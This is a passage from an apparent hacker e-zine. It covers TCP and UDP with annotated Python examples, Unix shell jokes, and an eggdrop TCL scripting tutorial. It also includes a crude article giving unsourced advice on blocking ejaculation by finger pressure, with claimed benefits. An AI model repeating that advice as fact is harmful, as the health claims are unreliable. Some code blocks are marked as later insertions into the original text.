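            self.rcv_nxt = seg.seq + 1           # "ACK 51" for "SYN SEQ 50"
            self.snd_nxt = self.iss + 1
            self.state = "SYN_RCVD"
            return Segment({"SYN", "ACK"}, self.iss, self.rcv_nxt)
        if self.state == "SYN_SENT" and seg.flags == {"SYN", "ACK"}:
            if seg.ack != self.snd_nxt:          # does not acknowledge our SYN
                return Segment({"RST"}, seg.ack, None)
            self.rcv_nxt = seg.seq + 1           # "ACK 201" for "SYN 200"
            self.state = "ESTABLISHED"
            return Segment({"ACK"}, self.snd_nxt, self.rcv_nxt)
        if self.state == "SYN_RCVD" and seg.flags == {"ACK"}:
            if seg.ack != self.snd_nxt:
                return Segment({"RST"}, seg.ack, None)
            self.state = "ESTABLISHED"
            return None
        if self.state == "ESTABLISHED" and seg.data:
            if seg.seq == self.rcv_nxt:          # in order: accept and advance
                self.received += seg.data
                self.rcv_nxt += len(seg.data)
            # Out of order: repeat the old number, i.e. "still waiting for this"
            return Segment({"ACK"}, self.snd_nxt, self.rcv_nxt)
        return None                              # everything else is ignored here


def three_way_handshake(a, b):
    """Run the open sequence and return the three segments exchanged."""
    b.passive_open()
    syn = a.active_open()
    syn_ack = b.receive(syn)
    ack = a.receive(syn_ack)
    b.receive(ack)
    return [syn, syn_ack, ack]


if __name__ == "__main__":
    a, b = Endpoint("A", 50), Endpoint("B", 200)
    for seg in three_way_handshake(a, b):
        print(sorted(seg.flags), "seq", seg.seq, "ack", seg.ack)
    print("B acks data with", b.receive(a.send(b"hello")).ack)
```

      The comparison of the acknowledgment number with ISS + 1 is what ties 
      a reply to this particular connection attempt; a SYN-ACK or ACK 
      carrying any other number is answered with a reset.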
      
      The TCP data transport actually embodies six subservices:
      
      1. Full duplex: Enables both ends of a connection to transmit at any 
      time, even simultaneously.
      
      2. Timeliness: Use of timers to ensure that data is transmitted within 
      a reasonable amount of time.
      
      3. Ordered: Data sent from one application is received in the same 
      order at the other end. This occurs despite the fact that the 
      datagrams might be received out of order through IP, because TCP 
      reassembles the message in the correct order before passing it up to 
      higher layers.
      
      4. Labeled: All connections have an agreed-upon precedence and 
      security value.
      
      5. TCP can regulate the flow of information through the use of buffers 
      and window limits.
      
      6. Checksums ensure that data is free of errors (within the checksum 
      algorithm's limits).
      
      Ok, now that I have completed that, let's move on to the promised 
      stuff on UDP.
      
      UDP: User Datagram Protocol. Just for your notes or whatever, just an 
      explanation of the acronym.
      
      TCP is a connection-based protocol. There are times when a 
      connectionless protocol is required, so UDP is used. UDP is used with 
      both Trivial File Transfer Protocol (TFTP) and the remote call 
      procedure. Connectionless communications don't provide reliability, 
      meaning that there is no indication to the sending device that a 
      message has been received correctly. Connectionless protocols also do 
      not offer error-recovery capabilities, which must be either ignored 
      or provided in the higher or lower layers. UDP is much simpler than 
      TCP: it interfaces with IP (and/or other protocols) without the 
      bother of flow control or error correction mechanisms, acting simply 
      as a sender and receiver of datagrams.
      
      The UDP message header is much, much simpler than TCP's. The following 
      are the fields of a UDP header:
      
      * Source port: An optional field with the port number. If a port 
      number is not specified, the field is set to 0.
      
      * Destination port: The port on the destination machine.
      
      * Length: The length of the datagram, including header and data.
      
      * Checksum: A 16-bit one's complement of the one's complement sum of 
      the datagram, including a pseudoheader similar to that of TCP.
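
      The one's complement checksum over the pseudo-header, which both the 
      TCP and UDP field lists above describe, together with a parser for 
      the four UDP fields. This is an added example, not code from the 
      original article. The addresses, ports and payload are constructed, 
      and the pseudo-header layout and protocol numbers (6 for TCP, 17 for 
      UDP) come from RFC 793 and RFC 768.

```python
import socket
import struct

PROTO_TCP, PROTO_UDP = 6, 17


def ones_complement_sum(data):
    """16-bit one's complement sum of data, padded to a whole word."""
    if len(data) % 2:
        data += b"\x00"
    total = 0
    for (word,) in struct.iter_unpack("!H", data):
        total += word
    while total >> 16:                      # fold the carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return total


def pseudo_header(src_ip, dst_ip, proto, length):
    """Source address, destination address, zero byte, protocol, length."""
    return (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
            + struct.pack("!BBH", 0, proto, length))


def transport_checksum(src_ip, dst_ip, proto, segment):
    """Checksum for a TCP segment or UDP datagram whose checksum field is 0."""
    covered = pseudo_header(src_ip, dst_ip, proto, len(segment)) + segment
    return ~ones_complement_sum(covered) & 0xFFFF


def build_udp(src_ip, dst_ip, sport, dport, payload):
    length = 8 + len(payload)               # header and data
    header = struct.pack("!HHHH", sport, dport, length, 0)
    csum = transport_checksum(src_ip, dst_ip, PROTO_UDP, header + payload)
    if csum == 0:
        csum = 0xFFFF       # 0 on the wire means "no checksum was computed"
    return struct.pack("!HHHH", sport, dport, length, csum) + payload


def parse_udp(src_ip, dst_ip, datagram):
    if len(datagram) < 8:
        raise ValueError("shorter than the 8-byte UDP header")
    sport, dport, length, csum = struct.unpack("!HHHH", datagram[:8])
    if length < 8 or length > len(datagram):
        raise ValueError("length field %d does not fit the %d bytes received"
                         % (length, len(datagram)))
    datagram = datagram[:length]            # ignore anything past the stated length
    if csum == 0:
        checksum_ok = None                  # the sender did not compute one
    else:
        # With the transmitted checksum left in place, the sum must be all ones.
        covered = pseudo_header(src_ip, dst_ip, PROTO_UDP, length) + datagram
        checksum_ok = ones_complement_sum(covered) == 0xFFFF
    return {"source_port": sport or None,   # 0 means "not specified"
            "dest_port": dport, "length": length,
            "checksum_ok": checksum_ok, "data": datagram[8:]}


if __name__ == "__main__":
    d = build_udp("192.0.2.1", "192.0.2.2", 1024, 69, b"constructed payload!")
    print(parse_udp("192.0.2.1", "192.0.2.2", d))
```

      Because the addresses are part of the sum, a datagram delivered to 
      the wrong host fails the check even when its own bytes are intact.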
      
      Well, that's basically it for UDP, a very simple protocol.
      
       I have to admit in this lecture I haven't covered a lot of things, 
      basic things that were involved with TCP/IP, but I didn't because of 
      time & compression; besides, there is enuf OSI stuff. But expect to 
      see more text from me here. 
      
       Well I didn't cover UDP but hell. I will make more text files on like 
      UDP and IPv6. IPv6 isn't ANSI yet but I suppose it will be.
      
      Shouts : B0g, Rhino9, b0g, gH, b0g, #hackphreak, b0g, mosthated, b0g, 
      #k-rad, grimreapa, b0g, rafay, b0g, system_v, b0g, HFG and all u's i 
      missed.
      
      
      b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
      
      b0g           b0g!#               !b0     b0  #@!       b0g!#      #@!
      b0g          !b0g!#@              !b0     b0  #@      @!b0g!#@     #@!
      b0g         @!b0g!#@!             !b0    !b0  #@     #@!    #@!    #@!
      b0g  @!     @!b  !#@!             !b0  #@!b0g!#@!b  !#@  0   @!b   #@!
      b0g #@!b   #@!b   #@!   !#@!b0g!  !b0 !#@!b0g!#@!b  !#  b0g!#@!b   #@!
      b0g!#@!b0  #@!b   #@!  g!#@!b0g!  !b0 !#@!b0g!#@!b g!# !b0g!#@ b0  #@!
      b0g!#@!b0g #@!b   #@! 0g!#  b0g!  !b0    !b  !#    g! @!b  !#@ b0  #@!
      b0g   !b0g #@!b   #@! 0g!#  b0g!  !b0   @!b  !#    g! @!b  !#@ b0  #@!
      b0g   !b0g #@!b   #@! 0g!   b0g!  !b0   @!b  !#    g! @!b  !#@ b0  #@!
      b0g   !b0g #@!b   #@! 0g!   b0g!  !b0 !#@!b0g!#@!  g! @!b  !#@ b0  #@!
      b0g   !b0g #@!b   #@! 0g!   b0g!  !b  !#@!b0g!#@!  g! @!b  !#@ b0  #@ 
      b0g   !b0g #@!b   #@! 0g!# !b0g!        @!  g!     g!# !b0g!#@!b0     
      b0g!#@!b   #@!b0g!#@!  g!#@!b0g!  !b0  #@!  g!      !# !b0g!#@!b   #@!
      b0g!#@!b    @!b0g!#@   g!#@!b0g!  !b0  #@! 0g!      !#@ b0 !#@!b   #@!
       0g!#@!      !b0g!#     !#@ b0g!  !b0  #@  0g        #@!           #@!
                                  b0g!                       !b0g!#@!       
                             g!#@!b0g                         b0g!#@        
                             g!#@!b0                                        
                             g!#@!b                                         
      
      b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
      
      
      
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 3 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::::::: Sex0r guide  k-rad-bob - 808@c2i.net ::::::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
      #Short guide to better sex.
      
      
      In this short article I'm going to share a little secret with you.
      I haven't met many people who actually knows about this trick, and it 
      always make me feel so good about myself when I meet them after a 
      given period of time since I sk00led them in the noble art of 
      seks0ring.
      The trick itself is as simple as it is useful.
      
      
      Here are just some of the advantages it has:
      
      
              #You won't smell like crusted semen.
      
              #You can masturbate almost anywhere at any time.
              Just wear a baggy pair of pants and you're in the clear!
      
              #You don't spoil the climax of your orgasm by searching for 
              tissue and/or aiming
      
              #Your chick won't swallow : ( ?
              Now she doesn't have to, yet you still orgasm in her mouth!#@$!
      
              #Did we say less messy?
      
              #You will maintain your erection for much longer
      
              #It drastically shortens the "recovery" time between each 
              "session"
      
              #Also you'll be able to last much longer
      
              #If you don't see the potential in this you're a complete idiot.
      
      
      Sounds too good to be true?
      It's not. It's also mad easy.
      
      Here follows a brief sk00ling section.
      I tried to make some leet ASCII illustrations but i got to horny :/
      
      
      
      #Step one.      
      Have some sort of sexual activity, where your penis is stimulated.
      
      
      
      #Step two.      
      As you are approaching your orgasm, quickly locate the secret spot.
      The spot is the "tube" that your sperm is being pumped through as it 
      travels for freedom, fortune and glory, and the promised land.
      The best exact location is right below your nutsack.
      
      
      
      #Step three.    
      As you come, gently use any number of fingers, i use my left or right 
      pointerfinger, and gently press down on the "pipe". Your 
      orgasm will take place and the semen being shot through your tube will 
      be stopped dead in its track, only to retreat. :)
      Keep applying pressure to the spot until your muscles have stopped 
      pumping.
      
      That is!
      
      
      [Note, if you think this is a cheap way to prevent your chick from 
      getting pregnant you are total flamboyant idiot. So for you braindead 
      assmunchs out there, read this:
      WARNING! If you don't use any form for birthcontrol while using this 
      trick chances are she's going to end up pregnant.]
      
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 4 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::: Shell fun  some g1mp  abuse@microsoft.com ::::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
      Some humorous things to do to a UNIX system:
      
       From the csh (C shell):
      
       % make love
       Make: Don't know how to make love. Stop.
      
       % got a light?
       No match.
      
       % sleep with me
       bad character
      
       % man: Why did you get a divorce?
       man:: Too many arguments.
      
       % rm God
       rm: God nonexistent
      
       % make 'heads or tails of all this'
       Make: Don't know how to make heads or tails of all this. Stop.
      
       % make sense
       Make: Don't know how to make sense. Stop.
      
       % make mistake
       Make: Don't know how to make mistake. Stop.
      
       % make bottle.open
       Make: Don't know how to make bottle.open. Stop.
      
       % \(-
       (-: Command not found.
      
       % rm -i God
       rm: remove God? y
       % ls God
       God not found
       % make light
       Make: Don't know how to make light. Stop.
      
       % date me
       You are not superuser: date not set
       Thu Aug 25 15:52:30 PDT 1988
      
       % man rear
       No manual entry for rear.
      
       % If I had a ) for every dollar Reagan spent, what would I have?
       Too many )'s.
      
       % * How would you describe George Bush
       *: Ambiguous.
      
       % %Vice-President
       %Vice-President: No such job.
      
       % ls Meese-Ethics
       Meese-Ethics not found
      
       % "How would you rate Reagan's senility?
       Unmatched ".
      
       % [Where is Jimmy Hoffa?
       Missing ].
      
       % ^How did the^sex change operation go?
       Modifier failed.
      
       % cp /dev/null sex;chmod 000 sex
       % more sex
       sex: Permission denied
       % mv sex show
       % strip show
       strip: show: Permission denied
      
       % who is my match?
       No match.
      
       % set i="Democratic_Platform";mkdir $i;chmod 000 $i;ls $i
       Democratic_Platform unreadable
      
       % awk "Polly, the ship is sinking"
       awk: syntax error near line 1
       awk: bailing out near line
      
       % %blow
       %blow: No such job.
      
       % 'thou shalt not commit adultery'
       thou shalt not commit adultery: Command not found.
      
       And from the bourne shell (sh):
      
       $ drink < bottle;opener
       bottle: cannot open
       opener: not found
      
       $ test my argument
       test: too many arguments
      
       $ "Amelia Earhart"
       Amelia Earhart: not found
      
       $ PATH=pretending! /usr/ucb/which sense
       no sense in pretending!
      
       $ man -kisses dog
       dog: nothing appropriate
      
       $ mkdir "Yellow Pages";fiYellow Pages
       $ mkdir matter;cat > matter
       matter: cannot create
      
       $ lost
       lost: not found
      
       $ found
       found: not found
      
       $ i=Hoffa ;>$i ;$i ;rm $i ;rm $i
       Hoffa: cannot execute
       rm: Hoffa nonexistent
      
       The following are ones that I can't get to work on my BSD 4.3, so I 
       suppose that they are stuff from ATT SysV or some other such:
      
       % strip bra
       bra: Cannot open
      
       % sccs what bottle
       can't open bottle (26)
      
       $ cat "door: paws too slippery"
       can't open door: paws too slippery
      
       $ cat food_in_tin_cans
       cat: can't open food_in_tin_cans
      
      
      
      
      
      ...........................................
      ...#""""""#................................
      ..." ~  ~ "................................
      ..(  0  0  ).. /------------------------\..
      ...|  <>  |... |                        |..
      ...| /""\ |...< I am dumb!              |..
      ...| ____ |... |                        |..
      ...||    ||... \------------------------/..
      ....\/.................................
      ......||...................................
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 5 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::::::: TCL Guide  Prae  prae@talk21.com ::::::::::::::: ] 
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
       [ note from the editor: ever write something in pico again and I'll 
      kill you with my bare hands, I spent 4 hours editing this to make it 
      look alright!@$ you'll see what I mean near the end :((( ]
      
      
      
      
      
      
      This document is made to help explain how to make TCL scripts for the 
      eggdrop. It covers BASIC concepts, and programming.  I suggest that 
      you have a copy of tcl-commands.doc handy, for this document will 
      refer to it many a time.  I hope this helps in learning TCL and good 
      luck!
      
            Outline:
                I - Triggers for code (Events/Binds)
               II - Procedures explained.
              III - Variables, If statements
               IV - String manipulation commands (string & l commands)
                V - Loops
               VI - User-get/User-set
              VII - Return command
             VIII - Good Programming Habits
               IX - Commands, in sample code & explained.
      
      
      
       ## I - Triggers for code (Events/Binds) ##
      
      Eggdrop operates on an event-based system.  If I type 'hello' to the 
      channel, the eggdrop matches that text against a list of events 
      (referred to as binds) for channel commands.  The eggdrop contains 
      many events: pubm (public text matching), mode (channel mode changes), 
      nick (nick changes), join (joins to the channel), part (parts of the 
      channel), and many others; they may be found in tcl-commands.doc.
      
       Syntax for bind:
      
          bind <type> <flags> <match> <proc name>
      
      
      
       Example:
      
          bind join - * join:join
      
      
      
       This bind is triggered when someone joins a channel. The '-' stands 
      for any flag (you could have put an 'o' to signify that the procedure 
      should only execute when the user has op access), and the match is 
      matched against the address/nick/channel (this accepts wildcards, 
      explained further in section IV). The procedure 'join:join' is the 
      code that is executed if the bind is matched.
      
       Another Example:
      
          bind dcc O sayhi dcc:sayhi
      
      
      
       If someone in DCC chat party line, with channel op access (and 
      console is to that channel), or global op access types '.sayhi' it 
      will execute the procedure 'dcc:sayhi'.  In Eggdrop 1.1.x the default 
      binds are prefixed with the type of bind then a ':' then the name; in 
      this document I will also follow that form.
      
       A list of flags may be obtained via .help whois in DCC chat
      
       
       ## II - Procedures Explained ##
      
       A procedure is a section of code which may be called by anything in a 
      program. For Eggdrop's use, this is where all the code for events 
      goes.  When an action takes place and a bind is triggered, it calls a 
      procedure to take action.  For example, if you wanted to write your 
      own auto-op script, whenever a person with op access joins the channel 
      it would call a procedure, and then the procedure would send the 
      command to give ops.
      
       syntax for procedures:
      
          proc <name of procedure> { <needed variables> } { body }
      
      
      
       When a bind is triggered it gives certain information to the 
      procedure that is required to do any thing, information such as nicks, 
      hosts, handles, and any other arguments needed.  This was taken from 
      tcl-commands.doc from the info of the bind pubm.
      
          procname <nick> <user@host> <handle> <channel> <text>
      
      
       What this says is that whenever a pubm bind is triggered you need 
      variables to hold these 5 pieces of information.  You can call the 
      variables anything you choose; it could be a, b, c, d and e. I 
      suggest using something short and to the point, such as nick, host, 
      hand, chan, and text.
      
       Example of a bind, and a procedure:
      
          bind pubm - hello pubm:hello
          proc pubm:hello {nick host handle chan text} {
            putserv "PRIVMSG $chan :Hello $nick"
          }
      
      
      
       # The Bind #
           public match (pubm)
           flags needed to trigger: None (- means none)
           triggered by: hello
           procedure to be called: pubm:hello
      
       # The Procedure #
           putserv is a command which sends text to the server.
           PRIVMSG is a server command for sending private msgs.
           $chan is the variable that will contain the channel which it 
           occurred on
           $nick is the variable that will contain the nickname of who said 
           "hello"
      
       !!!PLEASE NOTE!!!: When using RAW IRC commands you need to put a ':' 
      in front of text that has more than one word, such as the message of a 
      msg.
      
       The same thing can also be accomplished with this
      
          bind pubm - hello pubcommand_hello
          proc pubcommand_hello {n uh h chan t} {
            puthelp "PRIVMSG $n :Hello $n!"
          }
      
      
      
       The bind is basically the same I just changed the name of the 
      procedure.  In the procedure I changed the name of the variables, I 
      used 'n' instead of 'nick' and so on.  However I did use a different 
      command.  Puthelp is a Eggdrop command which queues the text so as not 
      to flood the bot.  I HIGHLY SUGGEST USING THIS!  :)
      
          (*) Use putserv when you need something to happen 
      instantaneously, like a kick or a ban.
      
          (*) Use pushmode when you want modes to stack to be sent as groups 
      to the server (e.g. '+ooo |mmortal Ernst Ec|ipse'), and instantaneous 
      speed is not necessary.
      
          (*) Use puthelp when messaging people, or channels.
      
      
      
       syntax for puthelp:
      
          puthelp "<raw server command> <Arguments>"
      
      
      
       Example:
      
          puthelp "NOTICE $nick :Hi there $nick!"
      
      
       same syntax applies for putserv and putmode as well
      
       If you notice <message> is only one space, that's why you need the 
      ""'s (quotes).  If you do not put the quotes there you get the error 
      msg: TCL error: called "puthelp" with too many arguments.  So you put 
      the quotes to show that it belongs only in one spot.
      
       Procedures can also be called directly from other procedures, without 
      the need for a bind.  For instance, if there is one particular thing 
      you must have done in ALL of your procedures and you don't feel like 
      writing it each time.  In this example you have to send a msg to the 
      person every time he does a command; here is some sample code:
      
          bind pubm - kick pubm:kick
          proc pubm:kick {nick host hand chan text} {
            noaccess $nick
          }
      
          proc noaccess {who} {
            puthelp "PRIVMSG $who :Sorry $who, you do not have access to that command"
          }
      
      
      
       noaccess is accessible by any procedure in the bot, so any time you 
      want to say someone doesn't have access, just call noaccess.
      
       !!!PLEASE NOTE!!!: I've seen this question about 100 times, and even 
      asked it my self once.  Never use 'args' as a variable in procedures 
      it does strange things.  It puts brackets ({}'s) around the variables 
      and causes big problems if one does not know how to use it.
      
      
       ## III - Variables, If statements ###
      
       Variables
      
       A variable is where you assign a symbol, or word (such as $nick) a 
      value. This value can be a string (words, or sentences) or a numeral.  
      In TCL there are 2 main types of variables: global, and private.  A 
      global variable is when you want to store information in it, and wish 
      other procedures to use.  A private variable could be a variable that 
      you use in a procedure, which does not need to be used outside of that 
      procedure.
      
       syntax for setting a variable:
      
          set <variable> <data>
      
      
       Example:
      
          set name "Prae"
      
      
      
       To unset a variable, simply use the command unset.
      
       syntax for unsetting a variable:
      
          unset <variable>
      
      
       Example:
      
          unset name
      
      
      
       When using the variable, put a '$' in front of it so the procedure 
      understands it is a variable.  So the variable 'name' would be used in 
      the code as '$name'.
      
       Additional Notes: To distinguish between a global, and private 
      variable simply use a 'global' command at the top of the proc.  When 
      setting the variable, or using a global statement the '$' is not 
      needed.
      
       syntax for global:
      
          global <variable names separated by spaces>
      
      
       Example:
      
          proc test {a b c d e} {
            global name owner botnick
          }
      
      
      
       Eggdrop has some pre-set global variables, such as the bot's nick 
      ($botnick). They are (taken from
       tcl-commands.doc):
      
         botnick
           current nickname the bot is using, ie 'Valis' or 'Valis0', etc
      
         botname
           current nick!user@host that the server sees, ie 
           'Valis!valis@crappy.com'
      
         server
           current server the bot is using, ie 'irc.math.ufl.edu:6667'
      
         version
           current bot version (ie: "1.1.2+pl1 1010201 pl1");
           first item is the text version, second item is a numerical
           version, and any following items are the names of patches that 
           have been added
      
         uptime
           unixtime value for when the bot was started
      
       To use them inside a proc, you must declare them as global at the 
      beginning of your proc (e.g 'global botnick').  You'll see better uses 
      for variables in the section IV
      
      
       If Statement:
      
       One of the most important aspects of a programming language is an 
      'if' statement.  It will return a TRUE or FALSE statement and execute 
      the commands associated with it.  If statements use a logic type of 
      approach, like:
      
          If 1 is equal to 1 times 1 then do this <> or else do this <>.
      
      
      
       syntax for if:
      
          if {v1 <operator> v2} {do this if true} else {do this if false (optional)}
      
      
       or
      
          if {v1 <operator> v2} {do this if true} {do this if false (optional)}
      
      
       notice the omission of else in the second example, both formats will 
      perform the same function.
      
       These are some of the operators available:
      
              ==  -  (equal)
              !=  -  (not equal)
              <=  -  (Less than/equal to)
              >=  -  (Greater than/equal to)
               <  -  (Less than)
               >  -  (Greater than)
              &&  -  (equivalent to and)
              ||  -  (equivalent to or)
      
      
       Example:
      
          if {$nick == $botnick} {
            putmsg $chan "I am $nick!!!"
          } else {
            putmsg $chan "I am NOT $nick"
          }
      
      
      
       This says if the value of $nick is the same as the value of $botnick 
      then it sends a msg to the chan saying "I am $nick", and if not saying 
      "I am not $nick".
      
       !!!PLEASE NOTE!!!: IT IS CASE SENSITIVE
       !!!PLEASE NOTE!!!: IT IS CASE SENSITIVE
       !!!PLEASE NOTE!!!: IT IS CASE SENSITIVE
       !!!PLEASE NOTE!!!: IT IS CASE SENSITIVE
       Did you get that? Maybe once more
       !!!PLEASE NOTE!!!: IT IS CASE SENSITIVE
      
       Case Sensitive Defined: Where the CaPs MaTtErs.  Such as 'HELLO' is 
      not the same as 'hello'.
      
       Now this is where TCL starts to differ from other programming 
      languages that I've encountered.  Lets say you want to write a check 
      to see if $nick is an op on $chan.  Well some languages could use an 
      operator like if $nick isop $chan. Not TCL...
      
       There is a procedure called 'isop'.
       This was taken from tcl-commands.doc
      
       syntax for isop:
      
          isop <nickname> <channel>
      
      
            returns: "1" if someone by that nickname is on the channel and 
                     has chop; "0" otherwise
      
       How do you use this in a if statement? This is how
      
       Example:
      
          if {[isop $nick $chan] == 1} {
            putmsg $chan "$nick is an op on $chan"
          } else {
            putmsg $chan "$nick is NOT an op on $chan"
          }
      
      
      
       Now the same can also be written like this:
      
          if {[isop $nick $chan] == 0} {
            putmsg $chan "$nick is NOT an op on $chan"
          }
      
      
       and so on.
      
       Or like this:
      
          if {[isop $nick $chan] != 1} {body}
      
      
       or
      
          if {[isop $nick $chan] != 0} {body}
      
      
      
       As you can see, you have many choices here.  Since an else statement 
      is optional, I suggest you write the if statement so that the case you 
      care about (true or false) executes the code, and don't use an else 
      statement.  What I mean by this is, let's say you want the following: 
      if the bot isn't an op then msg the chan and ask for ops.
      
       You can do this 2 ways, here is the harder way:
      
          if {[botisop $chan] == 1} {
          } else {
            putmsg $chan "Please opme!"
          }
      
      
       As you can see I didn't want anything to happen if he does have ops, 
      so you could change the first line to something like:
      
          if {[botisop $chan] != 1} {putmsg $chan "Please opme!"}
      
      
       or
      
          if {[botisop $chan] == 0} {putmsg $chan "Please opme!"}
      
      
      
       TCL will interpret

          if {[botisop $chan] == 1} {}
      
      
       the same as
      
          if {[botisop $chan]} {}
      
      
      
       If the statement is true it executes the {}, so there is no need for 
      the == 1.

       In the same way, these two mean the same thing:

          if {[botisop $chan] == 0} {}
          if {![botisop $chan]} {}


       ! negates what's in the []
      
       Either one would suit you fine.
      
       There are 100's more commands like this for anything from checking 
      flags, to doing ANYTHING with the eggdrop.  Again, all in 
      tcl-commands.doc (it almost sounds like I'm doing a commercial for 
      tcl-commands.doc, doesn't it?).
      
      
       ## IV - String Manipulation Commands (string and l commands) ##
      
       You want to make a public kick program, so ops can type !kick <nick> 
      <reason>. One problem: how do you extract those arguments from $text 
      (or equivalent variable)?  With lindex and lrange.

       These are core tcl commands so they won't be found in 
      tcl-commands.doc.  Here are their descriptions (from the TCL help file):
      
       NAME
       lindex - Retrieve an element from a list
      
       SYNOPSIS
       lindex list index 
      
       DESCRIPTION
       This command treats list as a Tcl list and returns the index'th 
      element from it (0 refers to the first element of the list).  In 
      extracting the element, lindex observes the same rules concerning 
      braces and quotes and backslashes as the Tcl command interpreter; 
      however, variable substitution and command substitution do not occur.  
      If index is negative or greater than or equal to the number of 
      elements in value, then an empty string is returned.  If index has the 
      value end, it refers to the last element in the list.
      
       Example:
      
          [lindex "0 1 2 3 4 5 6 7 8 9 10" 5]
      
      
       would return 5
      
          [lindex "a b c d e f g h i" 2]
      
      
       would return c (0 is the first parameter in the string!)
      
       Now here is the public kick program:
      
          bind pub O !kick pub:kick
          proc pub:kick {nick host hand chan text} {
            set whom [lindex $text 0]
            putserv "KICK $chan $whom :$nick told me so!"
          }
      
      
       # The Bind #
           public command (pub)
           flags needed to trigger: Channel Specific/Global Operator
           command to trigger: !kick <person>
           procedure to be called: pub:kick
      
       # The Procedure #
           whom is a private variable and will be erased when the proc is 
           finished.
           The lindex takes the first parameter in $text (which is the 
           person) and sets it to whom; the putserv kicks the person.
      
       What if you wanted to add a definable kick msg?  Make the program a 
      little more fancy.  The command is lrange, it takes the parameters 
      from N'th index to N'th index.  Here it is from the TCL help file:
      
       NAME
       lrange - Return one or more adjacent elements from a list
      
       SYNOPSIS
       lrange list first last
      
       DESCRIPTION
       List must be a valid Tcl list.  This command will return a new list 
      consisting of elements first through last, inclusive.  First or last 
      may be end (or any abbreviation of it) to refer to the last element of 
      the list.  If first is less than zero, it is treated as if it were 
      zero.  If last is greater than or equal to the number of elements in 
      the list, then it is treated as if it were end.  If first is greater 
      than last then an empty string is returned.  Note: 
      "lrange list first first" does not always produce the same result as 
      "lindex list first" (although it often does for simple fields that 
      aren't enclosed in braces); it does, however, produce exactly the same 
      results as "list [lindex list first]"
      
       So you would need to take text from parameter 1 to the end...
      
       This is how you would do it:
      
          bind pub O !kick pub:kick
          proc pub:kick {nick host hand chan text} {
            set whom [lindex $text 0]
            set reason [lrange $text 1 end]
            putserv "KICK $chan $whom :$reason"
          }
      
      
      
       Let's make it even more spoofy: what if $whom isn't on the 
      channel?  Well, we need an if statement, don't we?  Look in 
      tcl-commands.doc for the command.
      
       Here is the program:
      
          bind pub O !kick pub:kick
          proc pub:kick {nick host hand chan text} {
            set whom [lindex $text 0]
            set reason [lrange $text 1 end]
            if {[onchan $whom $chan]} {
              putserv "KICK $chan $whom :$reason"
            } else {
              puthelp "PRIVMSG $chan :$nick: $whom is not on $chan"
            }
          }
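
       The lindex description above says it follows the Tcl interpreter's 
      rules for braces, quotes and backslashes, which matters when $text is 
      whatever somebody typed on IRC.  The following is an added example, not 
      part of the original tutorial or of eggdrop, comparing direct 
      lindex/lrange on the raw text with splitting it into a list first.  It 
      runs in plain tclsh (8.4 or later); parse_kick_naive and parse_kick are 
      hypothetical names and the sample inputs are constructed.

```tcl
# Added example: plain tclsh, no eggdrop commands are used.
# parse_kick_naive / parse_kick are hypothetical helper names.

# The tutorial's approach: index straight into the raw channel text.
# lindex/lrange parse $text as a Tcl list, so braces, quotes and
# backslashes typed by the user are interpreted instead of copied.
proc parse_kick_naive {text} {
    set whom   [lindex $text 0]
    set reason [lrange $text 1 end]
    return [list $whom $reason]
}

# Hardened form: split the string on whitespace first, so every word
# becomes a literal list element, then join the reason back into a
# plain string before it is sent anywhere.
proc parse_kick {text} {
    set words {}
    foreach w [split [string trim $text]] {
        if {$w ne ""} { lappend words $w }   ;# drop empties from double spaces
    }
    if {[llength $words] == 0} {
        return -code error "usage: !kick <nick> ?reason?"
    }
    set whom   [lindex $words 0]
    set reason [join [lrange $words 1 end]]
    if {$reason eq ""} { set reason "requested" }
    return [list $whom $reason]
}

# Constructed sample inputs.  { } [ ] \ | are all legal in IRC nicks.
set samples [list \
    "lamer stop flooding" \
    "\{lamer\} nice nick" \
    "lamer this \{ is unbalanced" \
    "lamer  see  c:\\temp"]

foreach text $samples {
    puts "text  : $text"
    if {[catch {parse_kick_naive $text} r]} {
        puts "  naive : script error -> $r"
    } else {
        puts "  naive : whom=<[lindex $r 0]> reason=<[lindex $r 1]>"
    }
    if {[catch {parse_kick $text} r]} {
        puts "  split : rejected -> $r"
    } else {
        puts "  split : whom=<[lindex $r 0]> reason=<[lindex $r 1]>"
    }
}
```

       In the kick proc the same pattern applies: build the word list with 
      split, take $whom from it, and pass the joined reason to putserv.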
      
      
      
       This is from the TCL help file, I'll give examples for a few, but I'm 
      sure you can figure it out
      
       NAME
       string - Manipulate strings
      
       SYNOPSIS
       string option arg ?arg ...? 
      
       DESCRIPTION
       Performs one of several string operations, depending on option.  The 
      legal options (which may be abbreviated) are:
      
       string compare string1 string2
           Perform a character-by-character comparison of strings string1
           and string2 in the same way as the C strcmp procedure.  Return
           -1, 0, or 1, depending on whether string1 is lexicographically
           less than, equal to, or greater than string2.

       string first string1 string2
           Search string2 for a sequence of characters that exactly match
           the characters in string1.  If found, return the index of the
           first character in the first such match within string2.  If not
           found, return -1.

       string index string charIndex
           Returns the charIndex'th character of the string argument.  A
           charIndex of 0 corresponds to the first character of the string.
           If charIndex is less than 0 or greater than or equal to the
           length of the string then an empty string is returned.

       string last string1 string2
           Search string2 for a sequence of characters that exactly match
           the characters in string1.  If found, return the index of the
           first character in the last such match within string2.  If there
           is no match, then return -1.

       string length string
           Returns a decimal string giving the number of characters in
           string.

       string match pattern string
           See if pattern matches string; return 1 if it does, 0 if it
           doesn't.  Matching is done in a fashion similar to that used by
           the C-shell.  For the two strings to match, their contents must
           be identical except that the following special sequences may
           appear in pattern:

           *       Matches any sequence of characters in string, including
                   a null string.

